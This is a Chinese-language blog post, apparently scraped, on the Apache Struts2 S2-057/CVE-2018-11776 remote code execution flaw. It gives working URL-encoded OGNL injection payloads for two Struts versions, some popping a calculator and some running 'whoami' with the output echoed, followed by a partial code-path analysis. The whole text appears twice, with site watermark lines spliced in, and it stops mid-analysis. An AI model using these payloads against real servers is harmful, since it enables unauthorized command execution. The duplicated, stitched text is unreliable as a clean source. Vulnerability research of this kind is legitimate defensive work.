Struts2-057/CVE-2018-11776两个版本RCE漏洞分析(含EXP)
0x01 前言
2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776),该漏洞由Semmle Security Research team的安全研究员Man YueMo发现。该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行。同理,url标签未设置value和action值且上层动作未设置或用通配符namespace时也可能导致远程代码执行,经过笔者自建环境成功复现漏洞且可以执行命令回显,文末有你们想要的 !
0x02 漏洞利用
笔者搭的环境分别是Strust2 2.3.20 版本和 Strust2 2.3.34版本,漏洞利用大致分为三种方式:数值计算、弹出计算器、 命令回显。
2.1、数值计算
数值计算相对最简单,在URL上指定 %{100+200} 就可以发生跳转,得到计算的结果
2.2、弹出计算器
2.3.20 版本的POC如下:
/%24%7B%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C@java.lang.Runtime@getRuntime%28%29.exec%28%27calc.exe%27%29%7D/index.action
2.3.34 版本参考的POC如下:
/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23cmd%3D@java.lang.Runtime@getRuntime%28%29.exec%28%22calc%22%29%29%7D/index.action
2.3、命令回显
两个版本都是利用com.opensymphony.xwork2.dispatcher.HttpServletResponse对象去打印命令执行后的回显数据
2.3.20 版本的POC如下:
/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
2.3.34 版本的POC如下:
/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
攻击后效果如下图
0X03 漏洞分析
在分析漏洞之前,需要配置struts.xml文件,这个文件就是struts2的核心配置文件,大多数的时候增减配置都需要操控这里;
总共两处需要注意,第一处一定要配置struts.mapper.alwaysSelectFullNamespace = true ,否则不能触发漏洞,这个配置的目的是设定是否一直在最后一个斜线之前的任何位置选定NameSpace;第二处result标签返回的类型选择 “ redirectAction 或 chain“ , 只有这两个配置选项的值是可以将action转发或者重定向;关于type具体可以参考下图
说完了配置,开始动态分析。漏洞位于 struts2-core.jar!/org/apache/struts2/dispatcher/ServletActionRedirectResult.class
This.namespace这个成员的值来自于getNamespace()方法,再通过getUriFromActionMapping()返回URI字符串;
通过getUriFromActionMapping获取的值赋给了tmpLocation变量,接着表达式进入setLocation方法
0x01 前言
2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776),该漏洞由Semmle Security Research team的安全研究员Man YueMo发现。该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行。同理,url标签未设置value和action值且上层动作未设置或用通配符namespace时也可能导致远程代码执行,经过笔者自建环境成功复现漏洞且可以执行命令回显,文末有你们想要的 !
0x02 漏洞利用
笔者搭的环境分别是Strust2 2.3.20 版本和 Strust2 2.3.34版本,漏洞利用大致分为三种方式:数值计算、弹出计算器、 命令回显。
2.1、数值计算
数值计算相对最简单,在URL上指定 %{100+200} 就可以发生跳转,得到计算的结果
本文来自无奈人生安全网
2.2、弹出计算器
2.3.20 版本的POC如下:
/%24%7B%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C@java.lang.Runtime@getRuntime%28%29.exec%28%27calc.exe%27%29%7D/index.action
2.3.34 版本参考的POC如下:
/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23cmd%3D@java.lang.Runtime@getRuntime%28%29.exec%28%22calc%22%29%29%7D/index.action
内容来自无奈安全网
2.3、命令回显
两个版本都是利用com.opensymphony.xwork2.dispatcher.HttpServletResponse对象去打印命令执行后的回显数据
2.3.20 版本的POC如下:
/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
2.3.34 版本的POC如下:
/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
copyright 无奈人生
攻击后效果如下图
0X03 漏洞分析
在分析漏洞之前,需要配置struts.xml文件,这个文件就是struts2的核心配置文件,大多数的时候增减配置都需要操控这里;
总共两处需要注意,第一处一定要配置struts.mapper.alwaysSelectFullNamespace = true ,否则不能触发漏洞,这个配置的目的是设定是否一直在最后一个斜线之前的任何位置选定NameSpace;第二处result标签返回的类型选择 “ redirectAction 或 chain“ , 只有这两个配置选项的值是可以将action转发或者重定向;关于type具体可以参考下图
内容来自无奈安全网
说完了配置,开始动态分析。漏洞位于 struts2-core.jar!/org/apache/struts2/dispatcher/ServletActionRedirectResult.class
This.namespace这个成员的值来自于getNamespace()方法,再通过getUriFromActionMapping()返回URI字符串;
通过getUriFromActionMapping获取的值赋给了tmpLocation变量,接着表达式进入setLocation方法